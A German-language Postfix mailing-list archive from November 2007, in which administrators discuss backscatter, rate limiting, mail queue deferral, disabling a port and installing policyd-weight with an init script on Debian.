Zeit später erneut versuchen. Richtig? -----Ursprüngliche Nachricht----- Von: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users-bounces at listi.jpberlin.de] Im Auftrag von Peter Bauernfeind Gesendet: Freitag, 23. November 2007 11:19 An: Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein. Betreff: Re: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) mrg at unimx.de schrieb: > Danke, hatte ich schon gelesen. > Nur dabei war das Problem mit den Timeouts. > > Mail die z.B. von einem Server kommt der temp. Offline ist, würde diese Mail > ja abgelehnt. > Wie meinst du das? Wenn ein sendender Server während der Übermittlung in Ohnmacht fällt hilft sowieso nichts mehr. Ansonsten ist doch da ein Handshake: Sender sagt den Empfänger ich habe etwas für dich Empfänger sagt: Moment bitte, habe gerade zu tun, komm später wieder. Oder er sagt: OK lass hören. Sender zum Empfänger: Ich bin der Soundso, komm aus dem Wald und habe gute Gaben. Empfänger zum Sender: Du kommst hier nicht rein. Oder: Ist klar gib her. Sender an Empfänder: Hier nimm [über gibt die Mail] So das wars, schönen Tag noch Empfänger an Sender: Alles klar, ich hagbe alles. Bis demnächst. Natürlich kommt dann im Anschluß noch eine Überprüfung der "Gabe". Dann wird sortiert und die guten werden geliefert und die überlagerten Packete mit Würmer und Viren einfach entsorgt. Das Zurücksenden funktioniert auch mit richtigen Waren nicht, sonst wäre es einfachh eine Briefbombe zum Sender zurückzuschicken. ;-) Und um noch einmal auf die Ignoranz deiner User einzugehen, entweder sie zahlen mehr, dann gibt es auch mehr, oder eben nicht. Aber die Ignoranz deiner User auf den Rücken unbeteiligter auszulassen ist mindestens schlechter Stil. Mit freundlichem Gruß Peter Bauernfeind -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From driessen at fblan.de Fri Nov 23 16:50:22 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 23 Nov 2007 16:50:22 +0100 Subject: [Postfixbuch-users] neues Rate-Limiting im Umlauf..? In-Reply-To: <32769.80.87.162.65.1195831339.squirrel@aachalon.de> References: <36854.80.87.162.65.1195826639.squirrel@aachalon.de><000b01c82de1$27b39070$0565a8c0@uwe><000c01c82de3$0d56d640$0565a8c0@uwe> <32769.80.87.162.65.1195831339.squirrel@aachalon.de> Message-ID: <000d01c82de8$8eb81370$0565a8c0@uwe> Christian Bricart schrieb: > ich hab dann doch mal flott ne Liste gemacht (sortiert nach Anzahl der > nach mail.log produzierten Fehler bis minimal 3-stelliger Anzahl): > 6053 orgonics.com[130.94.157.19]: > 5604 mail.searchhound.com[67.15.68.32]: > 3936 mail02.interchangeusa.com[63.251.210.81]: > 685 fsumsg7.ferris.edu[161.57.5.88]: > 608 email-filter1.nn.k12.va.us[206.246.197.11]: > 607 email-filter2.nn.k12.va.us[206.246.197.20]: > 563 fsumsg6.ferris.edu[161.57.5.84]: > 547 mail.delphiq.com[213.123.232.16]: > 473 fsumsg3.ferris.edu[161.57.5.68]: > 437 mail2.axima.de[212.184.123.107]: > 437 mail1.axima.de[212.184.123.106]: > 425 gbrsecurity02.telesp.net.br[200.171.222.87]: > 373 gbrsecurity.telesp.net.br[200.171.222.88]: > 340 f2-h-mailman.infosys.de[194.97.60.179]: > 281 mail.aximaref.de[212.184.123.106]: > 201 MAIL.bellamylaw.com[24.199.251.44]: > 198 mail1.optima.net[206.186.57.42]: > 185 smtp.atl.cbeyond.com[66.180.96.29]: > 159 mx05.cside.jp[210.166.236.162]: > 150 mx3.cudamail.com[64.34.241.5]: > 143 mail-kr.bigfoot.com[211.115.216.222]: > 141 mail-kr.bigfoot.com[211.115.216.226]: > 133 dp123.fstinc.com[206.166.181.163]: > 131 mail-kr.bigfoot.com[211.115.216.225]: > 122 mx.nat-mail.com[66.161.86.166]: > 122 mail-kr6.bigfoot.com[211.115.216.222]: > 121 mx.nat-mail.com[66.161.86.165]: > 115 mail-kr3.bigfoot.com[211.115.216.226]: > 112 lexingtonsc.assetrealtyinc.com[::ffff:208.254.9.228]: > 112 lexingtonsc.assetrealtyinc.com[208.254.9.228]: > 110 MX.tecnoconsult.com[66.175.112.252]: > 106 halo.ispgateway.de[80.67.18.19]: > 101 mail-kr2.bigfoot.com[211.115.216.225]: > .... Sind für mich alles exoten (sprich noch nichts mit zu tun gehabt) Mal waaas ganz anderes sind das Bounces oder Mails die deine User dorthin schicken die du nicht loswirst ? Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From christian at bricart.de Fri Nov 23 16:57:37 2007 From: christian at bricart.de (Christian Bricart) Date: Fri, 23 Nov 2007 16:57:37 +0100 (CET) Subject: [Postfixbuch-users] neues Rate-Limiting im Umlauf..? In-Reply-To: <000d01c82de8$8eb81370$0565a8c0@uwe> References: <36854.80.87.162.65.1195826639.squirrel@aachalon.de><000b01c82de1$27b39070$0565a8c0@uwe><000c01c82de3$0d56d640$0565a8c0@uwe> <32769.80.87.162.65.1195831339.squirrel@aachalon.de> <000d01c82de8$8eb81370$0565a8c0@uwe> Message-ID: <42960.80.87.162.65.1195833457.squirrel@aachalon.de> Uwe Driessen wrote: > [..] > Mal waaas ganz anderes sind das Bounces oder Mails die deine User dorthin > schicken die du nicht loswirst ? naja - teils teils also in der Liste sind mindestens drei, von denen ich weiss, dass dort was legitimes hin soll... Gemerkt hab ich das, als ein potentieller Empfänger angerufen hat - mit der Bitte mal nachzuforschen, warum er eine von zwei Mails gestern mit einer und eine zweite direkt dahinter abgeschickte Mail erst sechs Stunden später bekommen hat und an wessen Mailserver das gelegen hat.. Christian From driessen at fblan.de Fri Nov 23 17:11:06 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 23 Nov 2007 17:11:06 +0100 Subject: [Postfixbuch-users] neues Rate-Limiting im Umlauf..? In-Reply-To: <42960.80.87.162.65.1195833457.squirrel@aachalon.de> References: <36854.80.87.162.65.1195826639.squirrel@aachalon.de><000b01c82de1$27b39070$0565a8c0@uwe><000c01c82de3$0d56d640$0565a8c0@uwe><32769.80.87.162.65.1195831339.squirrel@aachalon.de><000d01c82de8$8eb81370$0565a8c0@uwe> <42960.80.87.162.65.1195833457.squirrel@aachalon.de> Message-ID: <000e01c82deb$748e0c90$0565a8c0@uwe> Christian Bricart schrieb: > Uwe Driessen wrote: > > [..] > > Mal waaas ganz anderes sind das Bounces oder Mails die deine User dorthin > > schicken die du nicht loswirst ? > > naja - teils teils > also in der Liste sind mindestens drei, von denen ich weiss, dass dort was > legitimes hin soll... > > Gemerkt hab ich das, als ein potentieller Empfänger angerufen hat - mit > der Bitte mal nachzuforschen, warum er eine von zwei Mails gestern mit > einer und eine zweite direkt dahinter abgeschickte Mail erst sechs Stunden > später bekommen hat und an wessen Mailserver das gelegen hat.. Und zu denen wo was Legitimes hin soll sind da auch bounces dabei? Wie sind die Bounces zustande gekommen? (kamen die originalen auch von diesen Servern?) > > Christian Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From ml at awinkelmann.de Fri Nov 23 17:13:18 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Fri, 23 Nov 2007 17:13:18 +0100 Subject: [Postfixbuch-users] aol.com connection Problem In-Reply-To: <20071123112229.1739ecb6@gamma.meyer.home> References: <20071121200759.7f4d5673@gamma.meyer.home> <20071123091451.32672e77@gamma.meyer.home> <20071123112229.1739ecb6@gamma.meyer.home> Message-ID: <200711231713.18144.ml@awinkelmann.de> On Freitag, 23. November 2007, Andreas Meyer wrote: > > > Hmm, benutzt Du connection-caching? bzw. eine Postfix-Version die das > > > kann? > > > > Um ehrlich zu sein, weis ich nicht, ob ich connection-caching benutze. > > mail_version = 2.3.4 > > Kann man das ein oder ausschalten? > > OK http://www.postfix.org/CONNECTION_CACHE_README.html Ja, genau. -- Andreas From ml at awinkelmann.de Fri Nov 23 17:12:45 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Fri, 23 Nov 2007 17:12:45 +0100 Subject: [Postfixbuch-users] aol.com connection Problem In-Reply-To: <20071123091451.32672e77@gamma.meyer.home> References: <20071121200759.7f4d5673@gamma.meyer.home> <200711220714.10156.ml@awinkelmann.de> <20071123091451.32672e77@gamma.meyer.home> Message-ID: <200711231712.45904.ml@awinkelmann.de> On Freitag, 23. November 2007, Andreas Meyer wrote: > > > Das mit dem a-Record hat mich auch verwundert. Mein Mailserver, das > > > unbekannte Wesen. Was veranlaßt Postfix auf einen A-Record zu prüfen? > > > > Wenn Postfix keinen MX-Record zu einer Domain findet versucht es den > > A-Record. > > > > > Ja, ich habe einen eigenen DNS-Server, der die Root-Server befragt. > > > > Dann prüf ihn und natürlich auch den üblichen Verdächtigen chroot. Prüf > > ob das eingeschaltet ist bzw. sich im chroot die richtigen Config-Dateien > > befindet. > > chroot hatte ich noch nie eingeschaltet. Einige Distributionen schalten das automatisch ein. -- Andreas From ml at awinkelmann.de Fri Nov 23 17:46:36 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Fri, 23 Nov 2007 17:46:36 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix/Amavis_Mailqueue-Verha?= =?iso-8859-1?q?lten_=E4ndern?= In-Reply-To: <200711230918.20936.p.heinlein@heinlein-support.de> References: <4745AE5D.6010208@fabianluetzenkirchen.de> <200711221757.50223.ml@awinkelmann.de> <200711230918.20936.p.heinlein@heinlein-support.de> Message-ID: <200711231746.37341.ml@awinkelmann.de> On Freitag, 23. November 2007, Peer Heinlein wrote: > > > postconf -e "default_transport = hold" > > > /etc/init.d/postfix reload > > > > "hold" ist nicht wirklich ein transport. > > Äh, sorry, vertippt. > > "defer" statt "hold" Jo, das würde passen. > > Das was P. geschrieben hat mit defer_transports passt schon. Nur wollte > > der OP noch "fetchmail ebenfalls queuen" was mir aber irgendwie nichts > > sagt, > > Naja, fetchmail speist an localhost:25 ein, diese Mails gehen ebenfalls > nach defer und alles ist prima. $default_transport ist der Weg nach draussen. Alles was nach local:, virtual:, relay:, ... gehen würde, hält das nicht auf. Mit "fetchmail ebenfalls queuen" könnte der OP auch obige andere Ziele gemeint haben. -- Andreas From p.heinlein at heinlein-support.de Fri Nov 23 18:12:35 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Fri, 23 Nov 2007 18:12:35 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix/Amavis_Mailqueue-Verha?= =?iso-8859-1?q?lten_=E4ndern?= In-Reply-To: <200711231746.37341.ml@awinkelmann.de> References: <4745AE5D.6010208@fabianluetzenkirchen.de> <200711230918.20936.p.heinlein@heinlein-support.de> <200711231746.37341.ml@awinkelmann.de> Message-ID: <200711231812.36053.p.heinlein@heinlein-support.de> Am Freitag, 23. November 2007 17:46 schrieb Andreas Winkelmann: > $default_transport ist der Weg nach draussen. Alles was nach local:, > virtual:, relay:, ... gehen würde, hält das nicht auf. Mit "fetchmail > ebenfalls queuen" könnte der OP auch obige andere Ziele gemeint > haben. Ja, Himmelhergott, dann eben analog für die anderen Bereiche. Das denken kann und will ich den Leuten nicht abnehmen. Es liegt dann wirklich an einem selber, hier 1:1 zusammenzuzählen, das zu transferieren und ggf. eben nicht default_transport zu setzen, sondern eben virtual_transport und/oder relay_transport. In der 9. Klasse hieß das damals "Aufgebanbereich C - Transferleistung" wenn eine Klausur geschrieben wurde. Und, bevor ich es vergessen: Natürlich setzt man dann eben virtual_transport nicht auf smtp, sondern eben wieder auf virtual. Und, damit ist es dann komplett: Natürlich setzt man dann relay_transport ebenfalls nicht auf smtp und natürlich auch nicht auf virtual, sondern eben wieder auf relay. So. Wenn ich jetzt noch was vergessen haben sollte, dann ignoriert mein Posting bitte einfach, dann will ich zu der Sache lieber gar nichts gesagt haben. Mit freundlichen Grüßen Peer Heinlein -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Tel: 030 / 40 50 51 - 0 *** Fax: - 19 Die 2. Secure Linux Administration Conference am 6./7.12.2007 http://www.heinlein-support.de/slac Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From stefan-bs at gmx.net Fri Nov 23 20:13:51 2007 From: stefan-bs at gmx.net (Stefan Diekmann) Date: Fri, 23 Nov 2007 20:13:51 +0100 Subject: [Postfixbuch-users] Zweiten Port stundenweise abschalten Message-ID: <4747266F.6060709@gmx.net> Hallo, ich habe Postfix mit 2 Ports bei mir laufen. Beide sind in der master.cf konfiguriert. Einen davon möchte ich zweitweise per crontab abschalten. Muß ich dafür 2 master.cf vorhalten, die passende immer unter /etc/postfix ablegen und dann einen restart machen oder gibt es eine bessere Lösung? Viele Grüße Stefan Diekmann From ml at awinkelmann.de Fri Nov 23 20:37:22 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Fri, 23 Nov 2007 20:37:22 +0100 Subject: [Postfixbuch-users] Zweiten Port stundenweise abschalten In-Reply-To: <4747266F.6060709@gmx.net> References: <4747266F.6060709@gmx.net> Message-ID: <200711232037.23069.ml@awinkelmann.de> On Freitag, 23. November 2007, Stefan Diekmann wrote: > ich habe Postfix mit 2 Ports bei mir laufen. Beide sind in der master.cf > konfiguriert. Einen davon möchte ich zweitweise per crontab abschalten. > Muß ich dafür 2 master.cf vorhalten, die passende immer unter > /etc/postfix ablegen und dann einen restart machen oder gibt es eine > bessere Lösung? Alternativ mit iptables arbeiten. -- Andreas From hartmut.woehrle at mail.pcom.de Fri Nov 23 21:08:44 2007 From: hartmut.woehrle at mail.pcom.de (Hartmut =?iso-8859-1?q?W=F6hrle?=) Date: Fri, 23 Nov 2007 21:08:44 +0100 Subject: [Postfixbuch-users] Zweiten Port stundenweise abschalten In-Reply-To: <200711232037.23069.ml@awinkelmann.de> References: <4747266F.6060709@gmx.net> <200711232037.23069.ml@awinkelmann.de> Message-ID: <200711232108.44744.hartmut.woehrle@mail.pcom.de> Am Freitag, 23. November 2007 20:37 schrieb Andreas Winkelmann: > On Freitag, 23. November 2007, Stefan Diekmann wrote: > > ich habe Postfix mit 2 Ports bei mir laufen. Beide sind in der master.cf > > konfiguriert. Einen davon möchte ich zweitweise per crontab abschalten. > > Muß ich dafür 2 master.cf vorhalten, die passende immer unter > > /etc/postfix ablegen und dann einen restart machen oder gibt es eine > > bessere Lösung? > > Alternativ mit iptables arbeiten. > > -- > Andreas crontab: ifdown eth1 ifup eth1 Grüsse Hartmut -- =========================================== Hartmut Woehrle EMail: hartmut.woehrle at mail.pcom.de From stefan-bs at gmx.net Fri Nov 23 22:01:20 2007 From: stefan-bs at gmx.net (Stefan) Date: Fri, 23 Nov 2007 22:01:20 +0100 Subject: [Postfixbuch-users] Zweiten Port stundenweise abschalten In-Reply-To: <200711232108.44744.hartmut.woehrle@mail.pcom.de> References: <4747266F.6060709@gmx.net> <200711232037.23069.ml@awinkelmann.de> <200711232108.44744.hartmut.woehrle@mail.pcom.de> Message-ID: <47473FA0.2090106@gmx.net> Hartmut Wöhrle schrieb: > Am Freitag, 23. November 2007 20:37 schrieb Andreas Winkelmann: > >> On Freitag, 23. November 2007, Stefan Diekmann wrote: >> >>> ich habe Postfix mit 2 Ports bei mir laufen. Beide sind in der master.cf >>> konfiguriert. Einen davon möchte ich zweitweise per crontab abschalten. >>> Muß ich dafür 2 master.cf vorhalten, die passende immer unter >>> /etc/postfix ablegen und dann einen restart machen oder gibt es eine >>> bessere Lösung? >>> >> Alternativ mit iptables arbeiten. >> >> -- >> Andreas >> > > crontab: > ifdown eth1 > ifup eth1 > > Dafür müßte der zweite Port aber auch auf einer zweiten IP laufen. Beide Ports laufen aber auf der gleichen IP. Gruß Stefan > Grüsse > Hartmut > > -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From postfixbuch at thomas-schwenski.de Fri Nov 23 22:58:20 2007 From: postfixbuch at thomas-schwenski.de (Thomas Schwenski) Date: Fri, 23 Nov 2007 22:58:20 +0100 Subject: [Postfixbuch-users] 2 Fragen zu policyd-weight Message-ID: <47474CFC.5020107@thomas-schwenski.de> Ich habe eben einen Debian-Mailserver mit policyd-weight installiert und ein Init-Script dafür angelegt: mail:/# wget -c http://www.policyd-weight.org/policyd-weight mail:/# mv policyd-weight /usr/local/bin/policyd-weight mail:/# chmod 0555 /usr/local/bin/policyd-weight mail:/# apt-get install libnet-dns-perl mail:/# cp /etc/init.d/skeleton /etc/init.d/policyd-weight mail:/# mcedit /etc/init.d/policyd-weight mail:/# chmod 755 /etc/init.d/policyd-weight mail:/# touch /usr/local/etc/policyd-weight.conf mail:/# mcedit /usr/local/etc/policyd-weight.conf mail:/# addgroup polw mail:/# adduser --no-create-home --disabled-login --quiet --shell /bin/false --gecos GECOS --ingroup polw polw In der Konfigurationsdatei habe ich nur den Port geändert (auf 50004). Im Init-Script habe ich nur die Beschreibung, den Pfad und die Dienst-Datei angepasst. Danach wollte ich mit nmap prüfen, ob policyd-weight läuft. Allerdings findet nmap localhost auf dem Port 50004 keinen laufenden Dienst. Verbinde ich mich aber mit telnet localhost 50004, dann kommt eine Policy-Sitzung zustande. (Allerdings wird der Socket nach Übermittlung der Antwort des Policy-Servers nicht korrekt geschlossen und telnet hängt.) Woran liegt das? Die andere Sache ist, dass ich zwar mit /etc/init.d/policyd-weight stop Policyd-weight beenden kann, aber dadurch nur der Masterprozess herunterfährt. Der Cache-Prozess läuft weiterhin. Hat jemand ein komplett funktionierendes Init-Script oder weiß was ich noch anpassen muss? Gruß Thomas From gregor at a-mazing.de Fri Nov 23 23:08:56 2007 From: gregor at a-mazing.de (Gregor Hermens) Date: Fri, 23 Nov 2007 23:08:56 +0100 Subject: [Postfixbuch-users] 2 Fragen zu policyd-weight In-Reply-To: <47474CFC.5020107@thomas-schwenski.de> References: <47474CFC.5020107@thomas-schwenski.de> Message-ID: <200711232308.56379@office.a-mazing.net> Hallo Thomas, Am Freitag, 23. November 2007 schrieb Thomas Schwenski: > Ich habe eben einen Debian-Mailserver mit policyd-weight installiert und > ein Init-Script dafür angelegt: > ... warum nimmst du nicht das original Debian-Paket? http://packages.debian.org/etch/policyd-weight http://packages.debian.org/lenny/policyd-weight Gruß, Gregor -- @mazing fon +49 8142 6528665 Gregor Hermens fax +49 8142 6528669 Brucker Strasse 12 gregor.hermens at a-mazing.de D-82216 Gernlinden http://www.a-mazing.de/ From driessen at fblan.de Fri Nov 23 23:22:32 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 23 Nov 2007 23:22:32 +0100 Subject: [Postfixbuch-users] 2 Fragen zu policyd-weight In-Reply-To: <47474CFC.5020107@thomas-schwenski.de> References: <47474CFC.5020107@thomas-schwenski.de> Message-ID: <001801c82e1f$5745df80$0565a8c0@uwe> Thomas Schwenski schrieb: > Ich habe eben einen Debian-Mailserver mit policyd-weight installiert und > ein Init-Script dafür angelegt: > > mail:/# wget -c http://www.policyd-weight.org/policyd-weight > mail:/# mv policyd-weight /usr/local/bin/policyd-weight > mail:/# chmod 0555 /usr/local/bin/policyd-weight > mail:/# apt-get install libnet-dns-perl > mail:/# cp /etc/init.d/skeleton /etc/init.d/policyd-weight > mail:/# mcedit /etc/init.d/policyd-weight > mail:/# chmod 755 /etc/init.d/policyd-weight > mail:/# touch /usr/local/etc/policyd-weight.conf > mail:/# mcedit /usr/local/etc/policyd-weight.conf > mail:/# addgroup polw > mail:/# adduser --no-create-home --disabled-login --quiet --shell /bin/false --gecos > GECOS --ingroup polw polw > > > In der Konfigurationsdatei habe ich nur den Port geändert (auf 50004). > Im Init-Script habe ich nur die Beschreibung, den Pfad und die Dienst-Datei angepasst. > > Danach wollte ich mit nmap prüfen, ob policyd-weight läuft. > Allerdings findet nmap localhost auf dem Port 50004 keinen laufenden Dienst. > Verbinde ich mich aber mit telnet localhost 50004, dann kommt eine Policy-Sitzung > zustande. > (Allerdings wird der Socket nach Übermittlung der Antwort des Policy-Servers nicht > korrekt geschlossen und telnet hängt.) > > Woran liegt das? Warum nimmst du nicht das originale deb Paket von Debian und ersetzt danach das pw script > > Die andere Sache ist, dass ich zwar mit /etc/init.d/policyd-weight stop Policyd-weight > beenden kann, aber dadurch nur der Masterprozess herunterfährt. > Der Cache-Prozess läuft weiterhin. > > Hat jemand ein komplett funktionierendes Init-Script oder weiß was ich noch anpassen > muss? #! /bin/sh # Written by Miquel van Smoorenburg . # Modified for Debian # by Ian Murdock . # # Version: @(#)skeleton 1.9 26-Feb-2001 miquels at cistron.nl # /etc/init.d/policyd-weight: v1 2006/11/08 Jan Wagner ### BEGIN INIT INFO # Provides: policyd-weight # Required-Start: $local_fs $network $remote_fs $syslog # Required-Stop: $local_fs $network $remote_fs $syslog # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: start and stop the policyd-weight daemon # Description: a Perl policy daemon for the Postfix MTA ### END INIT INFO PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin DAEMON=/usr/sbin/policyd-weight NAME=policyd-weight DESC=policyd-weight test -x $DAEMON || exit 0 # Include policyd-weight defaults if available if [ -f /etc/default/policyd-weight ] ; then . /etc/default/policyd-weight fi set -e case "$1" in start) echo -n "Starting $DESC: " $DAEMON $DAEMON_OPTS start echo "$NAME." ;; stop) echo -n "Stopping $DESC: " $DAEMON $DAEMON_OPTS stop echo "$NAME." ;; reload) echo "Reloading $DESC configuration files." $DAEMON $DAEMON_OPTS reload ;; restart|force-reload) echo -n "Restarting $DESC: " $DAEMON $DAEMON_OPTS restart echo "$NAME." ;; *) N=/etc/init.d/$NAME echo "Usage: $N {start|stop|restart|reload|force-reload}" >&2 exit 1 ;; esac exit 0 > > Gruß > Thomas Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From driessen at fblan.de Fri Nov 23 23:43:51 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 23 Nov 2007 23:43:51 +0100 Subject: [Postfixbuch-users] 2 Fragen zu policyd-weight In-Reply-To: <47474CFC.5020107@thomas-schwenski.de> References: <47474CFC.5020107@thomas-schwenski.de> Message-ID: <001901c82e22$51f86c20$0565a8c0@uwe> Thomas Schwenski schrieb: > Danach wollte ich mit nmap prüfen, ob policyd-weight läuft. Wieso nimmst du nicht ps aux|grep policyd > Verbinde ich mich aber mit telnet localhost 50004, dann kommt eine Policy-Sitzung > zustande. > (Allerdings wird der Socket nach Übermittlung der Antwort des Policy-Servers nicht > korrekt geschlossen und telnet hängt.) > > Woran liegt das? Der error sitzt immer 40 cm vor dem Bildschirm *gg Ne mal im ernst was machst du dir da die ganze arbeit PW holen An die richtige stelle kopieren Starten In Postfix einbinden thats all not more to do Main.cf smtpd_recipient_restrictions = ... Permit_sasl... .... check_policy_service inet:127.0.0.1:12525 oder auch jeder andere Post auf dem du es laufen hast und schon tut es das was es soll der cache scheint absicht zu sein das der weiter rennt den kannst du dann ja auch mit killall policyd-weight rauswerfen (was aber in der Regel bei einem Reload/restart nicht notwendig ist, soweit ich weis hat Robert seit längerem nichts mehr an dem cacheformat geändert) > > Die andere Sache ist, dass ich zwar mit /etc/init.d/policyd-weight stop Policyd-weight > beenden kann, aber dadurch nur der Masterprozess herunterfährt. > Der Cache-Prozess läuft weiterhin. > > Hat jemand ein komplett funktionierendes Init-Script oder weiß was ich noch anpassen > muss? > > Gruß > Thomas > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From driessen at fblan.de Fri Nov 23 23:47:32 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 23 Nov 2007 23:47:32 +0100 Subject: [Postfixbuch-users] 2 Fragen zu policyd-weight In-Reply-To: <47474CFC.5020107@thomas-schwenski.de> References: <47474CFC.5020107@thomas-schwenski.de> Message-ID: <001a01c82e22$d600edd0$0565a8c0@uwe> Hab ich noch vergessen zu erwähnen Pw muß in der Regel nicht angepasst werden es rennt mit den Grundeinstellungen sehr gut und zuverlässig (wenns denn sein muß den Port ändern) Ansonsten bleibt nur zu zuschauen wie es seinen Dienst verrichtet und freuen das es einiges an Müll gar nicht erst auf den Server lässt. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From jonasge at gmx.net Sat Nov 24 00:36:39 2007 From: jonasge at gmx.net (Jonas Genannt) Date: Sat, 24 Nov 2007 00:36:39 +0100 Subject: [Postfixbuch-users] DKIM und Postfix In-Reply-To: <20071123125438.GE29431@charite.de> References: <20071123131950.428218f6@greulix.scheeder.de> <20071123125438.GE29431@charite.de> Message-ID: <20071124003639.61ee2675@valentina.brachium-system.net> Hallo, > http://www.ijs.si/software/amavisd/amavisd-new-docs.html#dkim warum gerade mit Amavis? - Irgendwelche Vorteile? Ich teste derzeit Postfix+Milter mit dkim-filter (mode: only_signing) fuers signing. Eine Moeglichkeit waere fuer den Verify waere, mit Spamassassin ueber das Plugin SpamAssassin::Plugin::DKIM. Wobei ich derzeit eigentlich nur auf Signing Wert lege. :) Gruss, Jonas From postfixbuch at thomas-schwenski.de Sat Nov 24 09:48:35 2007 From: postfixbuch at thomas-schwenski.de (Thomas Schwenski) Date: Sat, 24 Nov 2007 09:48:35 +0100 Subject: [Postfixbuch-users] 2 Fragen zu policyd-weight In-Reply-To: <001801c82e1f$5745df80$0565a8c0@uwe> References: <47474CFC.5020107@thomas-schwenski.de> <001801c82e1f$5745df80$0565a8c0@uwe> Message-ID: <4747E563.3030208@thomas-schwenski.de> Hallo Uwe und Gregor, > warum nimmst du nicht das original Debian-Paket? Ja warum eigentlich nicht? Uwe hat mit seiner 40cm Schätzung recht. Ich hab im aptitude policyd-weight einfach "übersehen". (Drin steht es, dass habe ich eben nachgeprüft.) Lag wohl am langen Arbeitstag. Die Konfiguration von Policyd-weight habe ich auch lediglich in punkto Port angepasst. > Wieso nimmst du nicht ps aux|grep policyd Weil mir ps aux lediglich sagt, dass ein Prozess läuft mehr nicht. nmap verfolgt nunmal einen anderen Ansatz und ist für das was ich rausfinden wollte (ob an dem eingestellten Port gelauscht wird) das passendere Tool. Mich verwundert es aber schon, dass nichts dergleichen erkannt wird. Was das Init-Script und die Installation betrifft werde ich das Debian-Paket verwenden. Danke euch. Thomas From driessen at fblan.de Sat Nov 24 09:59:07 2007 From: driessen at fblan.de (Uwe Driessen) Date: Sat, 24 Nov 2007 09:59:07 +0100 Subject: [Postfixbuch-users] 2 Fragen zu policyd-weight In-Reply-To: <4747E563.3030208@thomas-schwenski.de> References: <47474CFC.5020107@thomas-schwenski.de><001801c82e1f$5745df80$0565a8c0@uwe> <4747E563.3030208@thomas-schwenski.de> Message-ID: <000301c82e78$457b2270$0565a8c0@uwe> Thomas Schwenski schrieb: > > Weil mir ps aux lediglich sagt, dass ein Prozess läuft mehr nicht. > nmap verfolgt nunmal einen anderen Ansatz und ist für das was ich > rausfinden wollte (ob an dem eingestellten Port gelauscht wird) das > passendere Tool. Nun im falle von pw reicht das eigentlich ich hab selten ein so einfach einzubindendes Programm gesehen. Installieren, einbinden und fertig ob es seine Arbeit tut sieht man dann in den Logfiles > Was das Init-Script und die Installation betrifft werde ich das > Debian-Paket verwenden. die neuere Version von der pw seite kannst du dann einfach durch ersetzen des pw scripts zum laufen bringen mehr braucht und hat pw auch nicht (eine Datei). > > Danke euch. > > Thomas Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From r.felber at ek-muc.de Sat Nov 24 10:45:58 2007 From: r.felber at ek-muc.de (Robert Felber) Date: Sat, 24 Nov 2007 10:45:58 +0100 Subject: [Postfixbuch-users] 2 Fragen zu policyd-weight In-Reply-To: <47474CFC.5020107@thomas-schwenski.de> References: <47474CFC.5020107@thomas-schwenski.de> Message-ID: <20071124094558.GA64693@robtone.ek-muc.de> On Fri, Nov 23, 2007 at 10:57:57PM +0100, Thomas Schwenski wrote: > Ich habe eben einen Debian-Mailserver mit policyd-weight installiert und > ein Init-Script dafür angelegt: > > mail:/# wget -c http://www.policyd-weight.org/policyd-weight > mail:/# mv policyd-weight /usr/local/bin/policyd-weight > mail:/# chmod 0555 /usr/local/bin/policyd-weight > mail:/# apt-get install libnet-dns-perl > mail:/# cp /etc/init.d/skeleton /etc/init.d/policyd-weight > mail:/# mcedit /etc/init.d/policyd-weight > mail:/# chmod 755 /etc/init.d/policyd-weight > mail:/# touch /usr/local/etc/policyd-weight.conf > mail:/# mcedit /usr/local/etc/policyd-weight.conf > mail:/# addgroup polw > mail:/# adduser --no-create-home --disabled-login --quiet --shell /bin/false --gecos GECOS --ingroup polw polw > > > In der Konfigurationsdatei habe ich nur den Port geändert (auf 50004). > Im Init-Script habe ich nur die Beschreibung, den Pfad und die Dienst-Datei angepasst. > > Danach wollte ich mit nmap prüfen, ob policyd-weight läuft. > Allerdings findet nmap localhost auf dem Port 50004 keinen laufenden Dienst. *shrug* > Verbinde ich mich aber mit telnet localhost 50004, dann kommt eine Policy-Sitzung zustande. > (Allerdings wird der Socket nach Übermittlung der Antwort des Policy-Servers nicht korrekt geschlossen und telnet hängt.) Was so gewollt ist. Polw haengt nicht, sondern wartet auf weitere Eingaben - da postfix eine Verbindung zu einem policy server aufrecht erhalten 